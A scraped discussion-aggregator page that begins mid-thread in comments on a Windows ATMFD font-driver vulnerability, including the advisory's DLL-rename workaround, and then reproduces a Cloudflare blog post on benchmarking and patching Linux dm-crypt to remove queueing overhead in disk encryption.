Most of the features of which I am aware in fonts are modeled as FSMs, which can certainly be Turing complete but do not need to be. Off the top of my head, you could figure out a 'sane' max time for a 'script' to run without any loss of font quality, though it would not technically comply with the intended functionality.

I am at a loss for words as to why this was ever possible, although perhaps security didn't matter until this past decade and I am too young to remember how low a priority it used to be... certainly, putting anything in kernel space for performance reasons of all things seems ridiculous for desktop computing. I'll take a fucking massive performance hit to keep my data safer.

oefrha(4165) 4 days ago [-]

A font can have hundreds or thousands (see CJK) of glyphs, plus variants. Good luck distributing thousands of 5000x5000 bitmaps (easily in the GB range).

jjtheblunt(10000) 5 days ago [-]

"For systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities."

mike_d(10000) 5 days ago [-]

Anyone running around actively exploiting a zero-day Windows font parsing exploit likely also has a sandbox escape exploit too.

SlowRobotAhead(10000) 5 days ago [-]

> The security flaw exists in the Adobe...

Imagine my surprise. Geez maybe it's not the best idea to allow Adobe to entirely run the font game?

Source: worked at Adobe years ago

jamesgeck0(10000) 5 days ago [-]

Downvoted because Adobe hasn't had anything to do with this code for like two decades.

klingonopera(4335) 5 days ago [-]

I imagine you're getting downvotes because of your smug hyperbole, but in essence, I wouldn't deny that it is a legit question (not the entire font game, I guess, but a core part of it anyway).

It's also one of the reasons to reduce the use of proprietary software to a minimum, especially if it's a core component of the system. Bottom line: it's an increased security risk you can't verify.

On a serious note: Are there legit reasons to have it being a core component?

mrpippy(3793) 5 days ago [-]

ATMFD strikes again, and undoubtedly not for the last time.

More info on the history of ATMFD (and some previous vulnerabilities): https://googleprojectzero.blogspot.com/2015/07/one-font-vuln...

r00fus(10000) 5 days ago [-]

Is there no way to simply remove this DLL or is it too widely used in core Windows?

nightfly(10000) 5 days ago [-]

'a kernel-mode Adobe Type Manager Font Driver' - this is just such a crazy idea.

unnouinceput(10000) 5 days ago [-]

2 points:

1 - The article has wrong info. Under Windows 10 the name is ATMLIB.DLL; ATMFD.DLL is the name for older versions of Windows.

2 - Rename it. Here is the script to be used under an elevated command prompt (change the name accordingly if on Win10):

cd "%windir%\system32"

takeown.exe /f atmfd.dll

icacls.exe atmfd.dll /save atmfd.dll.acl

icacls.exe atmfd.dll /grant Administrators:(F)

rename atmfd.dll x-atmfd.dll

cd "%windir%\syswow64"

takeown.exe /f atmfd.dll

icacls.exe atmfd.dll /save atmfd.dll.acl

icacls.exe atmfd.dll /grant Administrators:(F)

rename atmfd.dll x-atmfd.dll

monadic2(10000) 4 days ago [-]

As someone with no knowledge of Windows, what's with their naming scheme? Is this some DOS remnant? Without context, the name alone would be reason to fail code review.

cawvid(10000) 4 days ago [-]

ATMLIB is just a client library, it doesn't process any fonts itself, it's not the same thing as ATMFD.

In Windows 10, they changed it so the ATMFD code runs sandboxed in fontdrvhost.exe, and eventually removed it completely from the kernel, that's why atmfd.dll is not there on later editions.

shbooms(10000) 4 days ago [-]

> 1 - article has wrong info. Under Windows 10 the name is ATMLIB.DLL. ATMFD.DLL is the name for older version of Windows

I don't think they have the wrong info. According to the MS advisory they linked (https://portal.msrc.microsoft.com/en-us/security-guidance/ad...) it would appear that ATMLIB.dll is not actually affected, as there is no mention of it at all, only ATMFD.dll. Also implied by the advisory is that ATMFD.dll is present on Windows 10, but only in versions prior to 1709:

> Rename ATMFD.DLL

> Please note: ATMFD.DLL is not present in Windows 10 installations starting with Windows 10, version 1709. Newer versions do not have this DLL.

asimops(10000) 4 days ago [-]

Please keep in mind that you need to localize 'Administrators' to make this work on non-English systems. When deploying this, it would be better to replace the name with the group's SID. I am on mobile right now, but some fellow hacker can surely provide it.

0x0(672) 4 days ago [-]

So does this mean that Windows 7 will forever be stuck with an easily(?) exploitable font engine vulnerability?

lexicality(10000) 4 days ago [-]

That's what end of life generally means. Look at what happened to XP...





Historical Discussions: Speeding up Linux disk encryption (March 25, 2020: 483 points)

(486) Speeding up Linux disk encryption

486 points 3 days ago by jgrahamc in 23rd position

blog.cloudflare.com | Estimated reading time – 36 minutes | comments | anchor

Data encryption at rest is a must-have for any modern Internet company. Many companies, however, don't encrypt their disks, because they fear the potential performance penalty caused by encryption overhead.

Encrypting data at rest is vital for Cloudflare with more than 200 data centres across the world. In this post, we will investigate the performance of disk encryption on Linux and explain how we made it at least two times faster for ourselves and our customers!

Encrypting data at rest

When it comes to encrypting data at rest there are several ways it can be implemented on a modern operating system (OS). Available techniques are tightly coupled with a typical OS storage stack. A simplified version of the storage stack and encryption solutions can be found on the diagram below:

At the top of the stack are applications, which read and write data in files (or streams). The file system in the OS kernel keeps track of which blocks of the underlying block device belong to which files and translates these file reads and writes into block reads and writes; however, the hardware specifics of the underlying storage device are abstracted away from the filesystem. Finally, the block subsystem actually passes the block reads and writes to the underlying hardware using appropriate device drivers.

The concept of the storage stack is actually similar to the well-known network OSI model, where each layer has a more high-level view of the information and the implementation details of the lower layers are abstracted away from the upper layers. And, similar to the OSI model, one can apply encryption at different layers (think about TLS vs IPsec or a VPN).

For data at rest we can apply encryption either at the block layers (either in hardware or in software) or at the file level (either directly in applications or in the filesystem).

Block vs file encryption

Generally, the higher in the stack we apply encryption, the more flexibility we have. With application level encryption the application maintainers can apply any encryption code they please to any particular data they need. The downside of this approach is that they actually have to implement it themselves, and encryption in general is not very developer-friendly: one has to know the ins and outs of a specific cryptographic algorithm, properly generate keys, nonces, IVs etc. Additionally, application level encryption does not leverage OS-level caching, the Linux page cache in particular: each time the application needs to use the data, it has to either decrypt it again, wasting CPU cycles, or implement its own decrypted "cache", which introduces more complexity to the code.

File system level encryption makes data encryption transparent to applications, because the file system itself encrypts the data before passing it to the block subsystem, so files are encrypted regardless of whether the application has crypto support or not. Also, file systems can be configured to encrypt only a particular directory or have different keys for different files. This flexibility, however, comes at the cost of a more complex configuration. File system encryption is also considered less secure than block device encryption, as only the contents of the files are encrypted. Files also have associated metadata, like file size, the number of files, the directory tree layout etc., which are still visible to a potential adversary.

Encryption down at the block layer (often referred to as disk encryption or full disk encryption) also makes data encryption transparent to applications and even whole file systems. Unlike file system level encryption it encrypts all data on the disk, including file metadata and even free space. It is less flexible though - one can only encrypt the whole disk with a single key, so there is no per-directory, per-file or per-user configuration. From the crypto perspective, not all cryptographic algorithms can be used, as the block layer doesn't have a high-level overview of the data anymore, so it needs to process each block independently. Most common algorithms require some sort of block chaining to be secure, so they are not applicable to disk encryption. Instead, special modes were developed just for this specific use-case.
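
For example, XTS - the mode benchmarked later in this post - derives a per-sector tweak so that each 16-byte block can be encrypted independently. Roughly, per IEEE P1619 (a sketch, not the full specification; K1 and K2 are the two halves of the XTS key, alpha is a fixed generator of GF(2^128), and j indexes the blocks within a sector):

    T_j = E_{K_2}(\text{sector number}) \otimes \alpha^{j}
    C_j = E_{K_1}(P_j \oplus T_j) \oplus T_j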

So which layer to choose? As always, it depends... Application and file system level encryption are usually the preferred choice for client systems because of the flexibility. For example, each user on a multi-user desktop may want to encrypt their home directory with a key they own and leave some shared directories unencrypted. On the contrary, on server systems, managed by SaaS/PaaS/IaaS companies (including Cloudflare) the preferred choice is configuration simplicity and security - with full disk encryption enabled any data from any application is automatically encrypted with no exceptions or overrides. We believe that all data needs to be protected without sorting it into 'important' vs 'not important' buckets, so the selective flexibility the upper layers provide is not needed.

Hardware vs software disk encryption

When encrypting data at the block layer it is possible to do it directly in the storage hardware, if the hardware supports it. Doing so usually gives better read/write performance and consumes fewer resources on the host. However, since most hardware firmware is proprietary, it does not receive as much attention and review from the security community. In the past this led to flaws in some implementations of hardware disk encryption, which rendered the whole security model useless. Microsoft, for example, has preferred software-based disk encryption since then.

We didn't want to put our data and our customers' data at risk by using potentially insecure solutions, and we strongly believe in open source. That's why we rely only on software disk encryption in the Linux kernel, which is open and has been audited by many security professionals across the world.

Linux disk encryption performance

We aim not only to save bandwidth costs for our customers, but to deliver content to Internet users as fast as possible.

At one point we noticed that our disks were not as fast as we would like them to be. Some profiling as well as a quick A/B test pointed to Linux disk encryption. Because not encrypting the data (even if it is a supposed-to-be-public Internet cache) is not a sustainable option, we decided to take a closer look into Linux disk encryption performance.

Device mapper and dm-crypt

Linux implements transparent disk encryption via a dm-crypt module, and dm-crypt itself is part of the device mapper kernel framework. In a nutshell, the device mapper allows pre/post-processing of IO requests as they travel between the file system and the underlying block device.

dm-crypt in particular encrypts 'write' IO requests before sending them further down the stack to the actual block device and decrypts 'read' IO requests before sending them up to the file system driver. Simple and easy! Or is it?

Benchmarking setup

For the record, the numbers in this post were obtained by running specified commands on an idle Cloudflare G9 server out of production. However, the setup should be easily reproducible on any modern x86 laptop.

Generally, benchmarking anything around a storage stack is hard because of the noise introduced by the storage hardware itself. Not all disks are created equal, so for the purpose of this post we will use the fastest disks available out there - that is no disks.

Instead Linux has an option to emulate a disk directly in RAM. Since RAM is much faster than any persistent storage, it should introduce little bias in our results.

The following command creates a 4GB ramdisk:

$ sudo modprobe brd rd_nr=1 rd_size=4194304
$ ls /dev/ram0

Now we can set up a dm-crypt instance on top of it thus enabling encryption for the disk. First, we need to generate the disk encryption key, 'format' the disk and specify a password to unlock the newly generated key.

$ fallocate -l 2M crypthdr.img
$ sudo cryptsetup luksFormat /dev/ram0 --header crypthdr.img
WARNING!
========
This will overwrite data on crypthdr.img irrevocably.
Are you sure? (Type uppercase yes): YES
Enter passphrase:
Verify passphrase:

Those who are familiar with LUKS/dm-crypt might have noticed we used a LUKS detached header here. Normally, LUKS stores the password-encrypted disk encryption key on the same disk as the data, but since we want to compare read/write performance between encrypted and unencrypted devices, we might accidentally overwrite the encrypted key during our benchmarking later. Keeping the encrypted key in a separate file avoids this problem for the purposes of this post.

Now, we can actually 'unlock' the encrypted device for our testing:

$ sudo cryptsetup open --header crypthdr.img /dev/ram0 encrypted-ram0
Enter passphrase for /dev/ram0:
$ ls /dev/mapper/encrypted-ram0
/dev/mapper/encrypted-ram0

At this point we can now compare the performance of encrypted vs unencrypted ramdisk: if we read/write data to /dev/ram0, it will be stored in plaintext. Likewise, if we read/write data to /dev/mapper/encrypted-ram0, it will be decrypted/encrypted on the way by dm-crypt and stored in ciphertext.

It's worth noting that we're not creating any file system on top of our block devices to avoid biasing results with a file system overhead.

Measuring throughput

When it comes to storage testing/benchmarking, the Flexible I/O tester (fio) is the usual go-to solution. Let's simulate a simple sequential read/write load with 4K block size on the ramdisk without encryption:

$ sudo fio --filename=/dev/ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=plain
plain: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...
Run status group 0 (all jobs):
   READ: io=21013MB, aggrb=1126.5MB/s, minb=1126.5MB/s, maxb=1126.5MB/s, mint=18655msec, maxt=18655msec
  WRITE: io=21023MB, aggrb=1126.1MB/s, minb=1126.1MB/s, maxb=1126.1MB/s, mint=18655msec, maxt=18655msec
Disk stats (read/write):
  ram0: ios=0/0, merge=0/0, ticks=0/0, in_queue=0, util=0.00%

The above command will run for a long time, so we just stop it after a while. As we can see from the stats, we're able to read and write with roughly the same throughput, around 1126 MB/s. Let's repeat the test with the encrypted ramdisk:

$ sudo fio --filename=/dev/mapper/encrypted-ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=crypt
crypt: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...
Run status group 0 (all jobs):
   READ: io=1693.7MB, aggrb=150874KB/s, minb=150874KB/s, maxb=150874KB/s, mint=11491msec, maxt=11491msec
  WRITE: io=1696.4MB, aggrb=151170KB/s, minb=151170KB/s, maxb=151170KB/s, mint=11491msec, maxt=11491msec

Whoa, that's a drop! We only get ~147 MB/s now, which is more than 7 times slower! And this is on a totally idle machine!

Maybe, crypto is just slow

The first thing we considered was to ensure we use the fastest crypto. cryptsetup allows us to benchmark all the available crypto implementations on the system to select the best one:

$ sudo cryptsetup benchmark
PBKDF2-sha1      1340890 iterations per second for 256-bit key
PBKDF2-sha256    1539759 iterations per second for 256-bit key
PBKDF2-sha512    1205259 iterations per second for 256-bit key
PBKDF2-ripemd160  967321 iterations per second for 256-bit key
PBKDF2-whirlpool  720175 iterations per second for 256-bit key
     aes-cbc   128b   969.7 MiB/s  3110.0 MiB/s
 serpent-cbc   128b           N/A           N/A
 twofish-cbc   128b           N/A           N/A
     aes-cbc   256b   756.1 MiB/s  2474.7 MiB/s
 serpent-cbc   256b           N/A           N/A
 twofish-cbc   256b           N/A           N/A
     aes-xts   256b  1823.1 MiB/s  1900.3 MiB/s
 serpent-xts   256b           N/A           N/A
 twofish-xts   256b           N/A           N/A
     aes-xts   512b  1724.4 MiB/s  1765.8 MiB/s
 serpent-xts   512b           N/A           N/A
 twofish-xts   512b           N/A           N/A

It seems aes-xts with a 256-bit data encryption key is the fastest here. But which one are we actually using for our encrypted ramdisk?

$ sudo dmsetup table /dev/mapper/encrypted-ram0
0 8388608 crypt aes-xts-plain64 0000000000000000000000000000000000000000000000000000000000000000 0 1:0 0

We do use aes-xts with a 256-bit data encryption key (count all the zeroes conveniently masked by dmsetup tool - if you want to see the actual bytes, add the --showkeys option to the above command). The numbers do not add up however: cryptsetup benchmark tells us above not to rely on the results, as 'Tests are approximate using memory only (no storage IO)', but that is exactly how we've set up our experiment using the ramdisk. In a somewhat worse case (assuming we're reading all the data and then encrypting/decrypting it sequentially with no parallelism) doing back-of-the-envelope calculation we should be getting around (1126 * 1823) / (1126 + 1823) =~696 MB/s, which is still quite far from the actual 147 * 2 = 294 MB/s (total for reads and writes).

dm-crypt performance flags

While reading the cryptsetup man page we noticed that it has two options prefixed with --perf-, which are probably related to performance tuning. The first one is --perf-same_cpu_crypt with a rather cryptic description:

Perform encryption using the same cpu that IO was submitted on.  The default is to use an unbound workqueue so that encryption work is automatically balanced between available CPUs.  This option is only relevant for open action.

So we enable the option:

$ sudo cryptsetup close encrypted-ram0
$ sudo cryptsetup open --header crypthdr.img --perf-same_cpu_crypt /dev/ram0 encrypted-ram0

Note: according to the latest man page there is also a cryptsetup refresh command, which can be used to enable these options live without having to 'close' and 're-open' the encrypted device. Our cryptsetup however didn't support it yet.

Verify that the option has really been enabled:

$ sudo dmsetup table encrypted-ram0
0 8388608 crypt aes-xts-plain64 0000000000000000000000000000000000000000000000000000000000000000 0 1:0 0 1 same_cpu_crypt

Yes, we can now see same_cpu_crypt in the output, which is what we wanted. Let's rerun the benchmark:

$ sudo fio --filename=/dev/mapper/encrypted-ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=crypt
crypt: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...
Run status group 0 (all jobs):
   READ: io=1596.6MB, aggrb=139811KB/s, minb=139811KB/s, maxb=139811KB/s, mint=11693msec, maxt=11693msec
  WRITE: io=1600.9MB, aggrb=140192KB/s, minb=140192KB/s, maxb=140192KB/s, mint=11693msec, maxt=11693msec

Hmm, now it is ~136 MB/s, which is slightly worse than before, so no good. What about the second option, --perf-submit_from_crypt_cpus:

Disable offloading writes to a separate thread after encryption.  There are some situations where offloading write bios from the encryption threads to a single thread degrades performance significantly.  The default is to offload write bios to the same thread.  This option is only relevant for open action.

Maybe, we are in the 'some situation' here, so let's try it out:

$ sudo cryptsetup close encrypted-ram0
$ sudo cryptsetup open --header crypthdr.img --perf-submit_from_crypt_cpus /dev/ram0 encrypted-ram0
Enter passphrase for /dev/ram0:
$ sudo dmsetup table encrypted-ram0
0 8388608 crypt aes-xts-plain64 0000000000000000000000000000000000000000000000000000000000000000 0 1:0 0 1 submit_from_crypt_cpus

And now the benchmark:

$ sudo fio --filename=/dev/mapper/encrypted-ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=crypt
crypt: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...
Run status group 0 (all jobs):
   READ: io=2066.6MB, aggrb=169835KB/s, minb=169835KB/s, maxb=169835KB/s, mint=12457msec, maxt=12457msec
  WRITE: io=2067.7MB, aggrb=169965KB/s, minb=169965KB/s, maxb=169965KB/s, mint=12457msec, maxt=12457msec

~166 MB/s, which is a bit better, but still not good...

Being desperate we decided to seek support from the Internet and posted our findings to the dm-crypt mailing list, but the response we got was not very encouraging:

If the numbers disturb you, then this is from lack of understanding on your side. You are probably unaware that encryption is a heavy-weight operation...

We decided to do some scientific research on this topic by typing 'is encryption expensive' into Google Search, and one of the top results, which actually contains meaningful measurements, is... our own post about the cost of encryption, but in the context of TLS! This is a fascinating read on its own, but the gist is: modern crypto on modern hardware is very cheap even at Cloudflare scale (doing millions of encrypted HTTP requests per second). In fact, it is so cheap that Cloudflare was the first provider to offer free SSL/TLS for everyone.

Digging into the source code

When trying to use the custom dm-crypt options described above, we were curious why they exist in the first place and what that 'offloading' is all about. Originally we expected dm-crypt to be a simple 'proxy', which just encrypts/decrypts data as it flows through the stack. It turns out dm-crypt does more than just encrypt memory buffers; a (simplified) IO traversal path diagram is presented below:

When the file system issues a write request, dm-crypt does not process it immediately - instead it puts it into a workqueue named 'kcryptd'. In a nutshell, a kernel workqueue just schedules some work (encryption in this case) to be performed at some later time, when it is more convenient. When 'the time' comes, dm-crypt sends the request to the Linux Crypto API for actual encryption. However, the modern Linux Crypto API is asynchronous as well, so depending on which particular implementation your system uses, most likely it will not be processed immediately, but queued again for 'later'. When the Linux Crypto API finally does the encryption, dm-crypt may try to sort pending write requests by putting each request into a red-black tree. Then a separate kernel thread, again at 'some time later', actually takes all IO requests in the tree and sends them down the stack.

Now for read requests: this time we need to get the encrypted data from the hardware first, but dm-crypt does not just ask the driver for the data; it queues the request into a different workqueue named 'kcryptd_io'. At some point later, when we actually have the encrypted data, we schedule it for decryption using the now familiar 'kcryptd' workqueue. 'kcryptd' will send the request to the Linux Crypto API, which may decrypt the data asynchronously as well.
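
To make the deferral concrete, the hand-off looks roughly like the following C sketch, modeled on dm-crypt's own kcryptd_queue_crypt() but with the structures abbreviated (illustrative, not the verbatim kernel source):

    #include <linux/workqueue.h>

    /* Abbreviated stand-ins for the real dm-crypt structures */
    struct crypt_config { struct workqueue_struct *crypt_queue; unsigned long flags; };
    struct dm_crypt_io  { struct crypt_config *cc; struct work_struct work; };

    static void kcryptd_crypt(struct work_struct *work); /* does the actual crypto, later */

    /* Instead of encrypting the bio inline, wrap it in a work item and defer
     * it to the 'kcryptd' workqueue: the submitter returns immediately and a
     * kernel worker thread picks the item up at 'some later time'. */
    static void kcryptd_queue_crypt(struct dm_crypt_io *io)
    {
        struct crypt_config *cc = io->cc;

        INIT_WORK(&io->work, kcryptd_crypt);
        queue_work(cc->crypt_queue, &io->work);
    }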

To be fair the request does not always traverse all these queues, but the important part here is that write requests may be queued up to 4 times in dm-crypt and read requests up to 3 times. At this point we were wondering if all this extra queueing can cause any performance issues. For example, there is a nice presentation from Google about the relationship between queueing and tail latency. One key takeaway from the presentation is:

A significant amount of tail latency is due to queueing effects

So, why are all these queues there and can we remove them?

Git archeology

No-one writes more complex code just for fun, especially for the OS kernel. So all these queues must have been put there for a reason. Luckily, the Linux kernel source is managed by git, so we can try to retrace the changes and the decisions around them.

The 'kcryptd' workqueue was in the source since the beginning of the available history with the following comment:

Needed because it would be very unwise to do decryption in an interrupt context, so bios returning from read requests get queued here.

So it was for reads only, but even then - why do we care if it is interrupt context or not, if the Linux Crypto API will likely use a dedicated thread/queue for encryption anyway? Well, back in 2005 the Crypto API was not asynchronous, so this made perfect sense.

In 2006 dm-crypt started to use the 'kcryptd' workqueue not only for encryption, but for submitting IO requests:

This patch is designed to help dm-crypt comply with the new constraints imposed by the following patch in -mm: md-dm-reduce-stack-usage-with-stacked-block-devices.patch

It seems the goal here was not to add more concurrency, but rather reduce kernel stack usage, which makes sense again as the kernel has a common stack across all the code, so it is a quite limited resource. It is worth noting, however, that the Linux kernel stack has been expanded in 2014 for x86 platforms, so this might not be a problem anymore.

A first version of 'kcryptd_io' workqueue was added in 2007 with the intent to avoid:

starvation caused by many requests waiting for memory allocation...

The request processing was bottlenecking on a single workqueue here, so the solution was to add another one. Makes sense.

We are definitely not the first ones experiencing performance degradation because of extensive queueing: in 2011 a change was introduced to conditionally revert some of the queueing for read requests:

If there is enough memory, code can directly submit bio instead queuing this operation in a separate thread.

Unfortunately, at that time Linux kernel commit messages were not as verbose as today, so there is no performance data available.

In 2015 dm-crypt started to sort writes in a separate 'dmcrypt_write' thread before sending them down the stack:

On a multiprocessor machine, encryption requests finish in a different order than they were submitted. Consequently, write requests would be submitted in a different order and it could cause severe performance degradation.

It does make sense, as sequential disk access used to be much faster than random access, and dm-crypt was breaking the pattern. But this mostly applies to spinning disks, which were still dominant in 2015. It may not be as important with modern fast SSDs (including NVMe SSDs).

Another part of the commit message is worth mentioning:

...in particular it enables IO schedulers like CFQ to sort more effectively...

It mentions the performance benefits for the CFQ IO scheduler, but Linux schedulers have improved since then to the point that CFQ scheduler has been removed from the kernel in 2018.

The same patchset replaces the sorting list with a red-black tree:

In theory the sorting should be performed by the underlying disk scheduler, however, in practice the disk scheduler only accepts and sorts a finite number of requests. To allow the sorting of all requests, dm-crypt needs to implement its own sorting.

The overhead associated with rbtree-based sorting is considered negligible so it is not used conditionally.

All of that makes sense, but it would be nice to have some backing data.

Interestingly, in the same patchset we see the introduction of our familiar 'submit_from_crypt_cpus' option:

There are some situations where offloading write bios from the encryption threads to a single thread degrades performance significantly

Overall, we can see that every change was reasonable and needed, however things have changed since then:

  • hardware became faster and smarter
  • Linux resource allocation was revisited
  • coupled Linux subsystems were rearchitected

And many of the design choices above may not be applicable to modern Linux.

The 'clean-up'

Based on the research above we decided to try to remove all the extra queueing and asynchronous behaviour and revert dm-crypt to its original purpose: simply encrypt/decrypt IO requests as they pass through. But for the sake of stability and further benchmarking we ended up not removing the actual code, but rather adding yet another dm-crypt option, which bypasses all the queues/threads, if enabled. The flag allows us to switch between the current and new behaviour at runtime under full production load, so we can easily revert our changes should we see any side-effects. The resulting patch can be found on the Cloudflare GitHub Linux repository.
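
Conceptually, the new flag just short-circuits the hand-off sketched earlier. Reusing the abbreviated structures from that sketch, the dispatch decision looks something like this (the flag name and plumbing are illustrative stand-ins; the real patch is in the repository linked above):

    #include <linux/bitops.h>

    enum { DM_CRYPT_FORCE_INLINE = 0 };  /* hypothetical flag bit, for illustration */

    /* Illustrative only: route each IO either inline or through the queues */
    static void crypt_dispatch(struct crypt_config *cc, struct dm_crypt_io *io)
    {
        if (test_bit(DM_CRYPT_FORCE_INLINE, &cc->flags))
            kcryptd_crypt(&io->work);               /* synchronous: do the crypto
                                                       now, in this context */
        else
            queue_work(cc->crypt_queue, &io->work); /* default: defer to 'kcryptd' */
    }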

Synchronous Linux Crypto API

From the diagram above we remember that not all queueing is implemented in dm-crypt. The modern Linux Crypto API may also be asynchronous, and for the sake of this experiment we want to eliminate queues there as well. What does 'may be' mean, though? The OS may contain different implementations of the same algorithm (for example, hardware-accelerated AES-NI on x86 platforms and generic C-code AES implementations). By default the system chooses the 'best' one based on the configured algorithm priority. dm-crypt allows overriding this behaviour and requesting a particular cipher implementation using the capi: prefix. However, there is one problem. Let us actually check the available AES-XTS (this is our disk encryption cipher, remember?) implementations on our system:

$ grep -A 11 'xts(aes)' /proc/crypto
name         : xts(aes)
driver       : xts(ecb(aes-generic))
module       : kernel
priority     : 100
refcnt       : 7
selftest     : passed
internal     : no
type         : skcipher
async        : no
blocksize    : 16
min keysize  : 32
max keysize  : 64
--
name         : __xts(aes)
driver       : cryptd(__xts-aes-aesni)
module       : cryptd
priority     : 451
refcnt       : 1
selftest     : passed
internal     : yes
type         : skcipher
async        : yes
blocksize    : 16
min keysize  : 32
max keysize  : 64
--
name         : xts(aes)
driver       : xts-aes-aesni
module       : aesni_intel
priority     : 401
refcnt       : 1
selftest     : passed
internal     : no
type         : skcipher
async        : yes
blocksize    : 16
min keysize  : 32
max keysize  : 64
--
name         : __xts(aes)
driver       : __xts-aes-aesni
module       : aesni_intel
priority     : 401
refcnt       : 7
selftest     : passed
internal     : yes
type         : skcipher
async        : no
blocksize    : 16
min keysize  : 32
max keysize  : 64

We want to explicitly select a synchronous cipher from the above list to avoid queueing effects in threads, but the only two supported are xts(ecb(aes-generic)) (the generic C implementation) and __xts-aes-aesni (the x86 hardware-accelerated implementation). We definitely want the latter as it is much faster (we're aiming for performance here), but it is suspiciously marked as internal (see internal: yes). If we check the source code:

Mark a cipher as a service implementation only usable by another cipher and never by a normal user of the kernel crypto API

So this cipher is meant to be used only by other wrapper code in the Crypto API and not outside it. In practice this means that the caller of the Crypto API needs to explicitly specify this flag when requesting a particular cipher implementation, but dm-crypt does not do it, because by design it is not part of the Linux Crypto API, rather an 'external' user. We already patch the dm-crypt module, so we could just as well add the relevant flag. However, there is another problem with AES-NI in particular: the x86 FPU. 'Floating point' you say? Why do we need floating point math to do symmetric encryption, which should only be about bit shifts and XOR operations? We don't need the math, but AES-NI instructions use some of the CPU registers, which are dedicated to the FPU. Unfortunately the Linux kernel does not always preserve these registers in interrupt context for performance reasons (saving/restoring the FPU is expensive). But dm-crypt may execute code in interrupt context, so we risk corrupting some other process's data, and we go back to the 'it would be very unwise to do decryption in an interrupt context' statement in the original code.

Our solution to address the above was to create another, somewhat 'smart' Crypto API module. This module is synchronous and does not roll its own crypto; it is just a 'router' of encryption requests (sketched in C after the list below):

  • if we can use the FPU (and thus AES-NI) in the current execution context, we just forward the encryption request to the faster, 'internal' __xts-aes-aesni implementation (and we can use it here, because now we are part of the Crypto API)
  • otherwise, we just forward the encryption request to the slower, generic C-based xts(ecb(aes-generic)) implementation
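
In C, the routing decision looks roughly like this (a sketch: the context struct and field names are illustrative, not the verbatim module; the real code is in the patches linked below):

    #include <crypto/skcipher.h>
    #include <asm/fpu/api.h>   /* irq_fpu_usable() */

    /* Illustrative context: handles to the two underlying implementations,
     * allocated once when the proxy transform is set up. */
    struct xtsproxy_ctx {
        struct crypto_skcipher *aesni_tfm;   /* fast path: __xts-aes-aesni */
        struct crypto_skcipher *generic_tfm; /* fallback: xts(ecb(aes-generic)) */
    };

    static int xtsproxy_encrypt(struct skcipher_request *req)
    {
        struct xtsproxy_ctx *ctx =
            crypto_skcipher_ctx(crypto_skcipher_reqtfm(req));

        /* AES-NI touches FPU registers, which are only safe to use in
         * contexts where the kernel can save/restore FPU state. */
        if (irq_fpu_usable())
            skcipher_request_set_tfm(req, ctx->aesni_tfm);
        else
            skcipher_request_set_tfm(req, ctx->generic_tfm);

        /* Both targets are synchronous, so this completes inline. */
        return crypto_skcipher_encrypt(req);
    }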

Using the whole lot

Let's walk through the process of using it all together. The first step is to grab the patches and recompile the kernel (or just compile dm-crypt and our xtsproxy modules).

Next, let's restart our IO workload in a separate terminal, so we can make sure we can reconfigure the kernel at runtime under load:

$ sudo fio --filename=/dev/mapper/encrypted-ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=crypt
crypt: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...

In the main terminal make sure our new Crypto API module is loaded and available:

$ sudo modprobe xtsproxy
$ grep -A 11 'xtsproxy' /proc/crypto
driver       : xts-aes-xtsproxy
module       : xtsproxy
priority     : 0
refcnt       : 0
selftest     : passed
internal     : no
type         : skcipher
async        : no
blocksize    : 16
min keysize  : 32
max keysize  : 64
ivsize       : 16
chunksize    : 16

Reconfigure the encrypted disk to use our newly loaded module and enable our patched dm-crypt flag (we have to use the low-level dmsetup tool, as cryptsetup obviously is not aware of our modifications):

$ sudo dmsetup table encrypted-ram0 --showkeys | sed 's/aes-xts-plain64/capi:xts-aes-xtsproxy-plain64/' | sed 's/$/ 1 force_inline/' | sudo dmsetup reload encrypted-ram0

We just 'loaded' the new configuration, but for it to take effect, we need to suspend/resume the encrypted device:

$ sudo dmsetup suspend encrypted-ram0 && sudo dmsetup resume encrypted-ram0

And now observe the result. We may go back to the other terminal running the fio job and look at the output, but to make things nicer, here's a snapshot of the observed read/write throughput in Grafana:

Wow, we have more than doubled the throughput! With the total throughput of ~640 MB/s we're now much closer to the expected ~696 MB/s from above. What about the IO latency? (The await statistic from the iostat reporting tool):

The latency has been cut in half as well!

To production

So far we have been using a synthetic setup with some parts of the full production stack missing, like file systems, real hardware and most importantly, production workload. To ensure we're not optimising imaginary things, here is a snapshot of the production impact these changes bring to the caching part of our stack:

This graph represents a three-way comparison of the worst-case response times (99th percentile) for a cache hit in one of our servers. The green line is from a server with unencrypted disks, which we will use as baseline. The red line is from a server with encrypted disks with the default Linux disk encryption implementation and the blue line is from a server with encrypted disks and our optimisations enabled. As we can see the default Linux disk encryption implementation has a significant impact on our cache latency in worst case scenarios, whereas the patched implementation is indistinguishable from not using encryption at all. In other words the improved encryption implementation does not have any impact at all on our cache response speed, so we basically get it for free! That's a win!

We're just getting started

This post shows how an architecture review can double the performance of a system. We also reconfirmed that modern cryptography is not expensive and that there is usually no excuse not to protect your data.

We are going to submit this work for inclusion in the main kernel source tree, but most likely not in its current form. Although the results look encouraging we have to remember that Linux is a highly portable operating system: it runs on powerful servers as well as small resource constrained IoT devices and on many other CPU architectures as well. The current version of the patches just optimises disk encryption for a particular workload on a particular architecture, but Linux needs a solution which runs smoothly everywhere.

That said, if you think your case is similar and you want to take advantage of the performance improvements now, you may grab the patches and hopefully provide feedback. The runtime flag makes it easy to toggle the functionality on the fly and a simple A/B test may be performed to see if it benefits any particular case or setup. These patches have been running across our wide network of more than 200 data centres on five generations of hardware, so can be reasonably considered stable. Enjoy both performance and security from Cloudflare for all!




All Comments: [-] | anchor

nullc(2095) 3 days ago [-]

